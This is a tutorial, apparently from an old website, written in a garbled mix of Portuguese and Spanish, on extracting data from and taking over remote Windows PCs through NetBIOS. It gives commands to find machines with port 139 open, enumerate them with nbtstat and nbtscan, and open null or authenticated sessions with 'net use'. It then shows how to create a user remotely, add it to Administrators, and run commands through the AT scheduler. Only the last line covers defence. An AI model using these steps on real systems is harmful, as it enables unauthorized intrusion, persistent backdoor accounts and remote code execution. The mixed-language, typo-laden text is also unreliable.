Neste site serão mostradas diferentes formas de extrair todos os dados possíveis de um PC remoto através do NetBIOS.

A primeira coisa a fazer é verificar se o computador ao qual queremos nos conectar tem a porta NetBIOS aberta, o a porta é a 139; pode ser feito através da consola do MSDOS com este comando: telnet ENDEREÇOIP 139 e se conectar, estará aberta; se não, então procure outro PC.

O segundo mais importante é ter a tabela NetBios, que nos indicará quais serviços estão em execução no computador remoto, que verificaremos com os resultados obtidos com comandos posteriores

Com este comando do MSDOS poderemos saber quais os serviços que a máquina remota executa: nbtstat -A ENDEREÇOIP ou nbtstat -a NOMEPC. Além disso, também nos dará o endereço MAC caso nos interesse.

Como podemos ver na imagem, fazemos um nbtstat a um IP ou nomePC e ele nos dá esses resultados, que comparamos com a tabela NetBIOS e retiramos dados interessantes como o seu utilizador, o domínio a que pertence… e se for um Controlador de Domínio, veríamos os serviços que executa.

Para establecer lo que se llama sesión nula, tenemos que ejecutar este comando: net use DIRECCIONIPIPC$ “”/quer:”” . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anónimo.

Para autenticarnos en un equipo remoto con un usuario en concreto: net use DIRECCIONIP /u:USUARIO CONTRASEÑA ou net use DIRECTIONIPC$ /u:USUARIO CONTRASEÑA ou net use DIRECCIONIPRECURSO /u:USUARIO CONTRASEÑA… Una vez autenticados en el host remoto para ver el contenido de la carpeta se puede hacer net view DIRECCIONIP y veremos el contenido via MSDOS, pero também puedes hacer, PRINCÍPIO > EJECUTAR y pones lo que quieras: DIRECCIONIP o DIRECCIONIPRECURSO y te mostrará con la ventana del explorador de Windows el contenido.

Ver la hora remota: net time DIRECCIONIP
Ver domínios disponíveis: net view /domínio
Ver equipos de un domínio concreto: net view /domínio:BUJARRA
Ver los usuarios de un equipo: net user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user nombreusuario contraseña /ADD (Ideal para crear un usuario en un PC remoto con el comando AT)
Borrar un usuario: net user nombreusuario /DELETE
Ver los grupos de un PC: net group
Meter a un usuario en un grupo: net group nombregrupo nombreusuario /ADD (Ideal para meter en grupo Administradores al usuario que hemos criado remotamente en un PC)
Sacar a un utilizador de un grupo: net group nombregrupo nombreusuario /DELETE

Comando AT, para executar cosas en remoto. Con el comando at DIRECTIONIP veremos las tareas programadas que tiene su equipo y con el comando at DIRECTIONIP 21:30 /INTERACTIVE “comando de msdos a executar en el PC remoto”. En el comando anterior el valor 21:30 es la hora a la que le he puesto yo que se ejecute el comando de MSDOS que va entre comillas, así que se le puede poner cualquier hora, pero primero mira mejor que hora tiene!

La herramienta del Kit de Recursos de MS Windows nltest.rar muestra los controladores de dominio de un dominio en concreto, Exemplo:
C:>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
bujarra01

Interesante sería el programa Nbtscan que lo que hace es un ‘nbtstat’ de toda una red a una velocidad impresionante.Ejemplo:

C:>nbtscan 192.168.0.0/24
&nbspDoing NBT name scan for addresses from 192.168.0.0/24
&nbspIP address &nbspNetBIOS Server &nbspServer &nbspUser &nbspMAC address
&nbsp—————————————————————————–
&nbsp192.168.0.0 &nbspSendto failed: Cannot assign requested address
&nbsp192.168.0.1 &nbspBUJARRA01 <Servidor> <desconhecido> &nbsp00-e0-7d-78-11-e6
&nbsp192.168.0.13 &nbspMARIA <Servidor> &nbspMARIA &nbsp00-e0-7d-76-5a-2b
&nbsp192.168.0.55 &nbspVICETOPC <Servidor> &nbspVICETO 00-00-f8-30-fa-23
&nbsp192.168.0.100 &nbspRecvfrom failed: Reset de ligação por peer

Durante protegernos deste tipo de ataques devemos o cerrar el puerto 139 en el router, o habilitaremos el firewall en XP o quitaremos o serviço de partilhar carpetas e impresoras para redes Microsoft (en qualquer S.O. da Microsoft).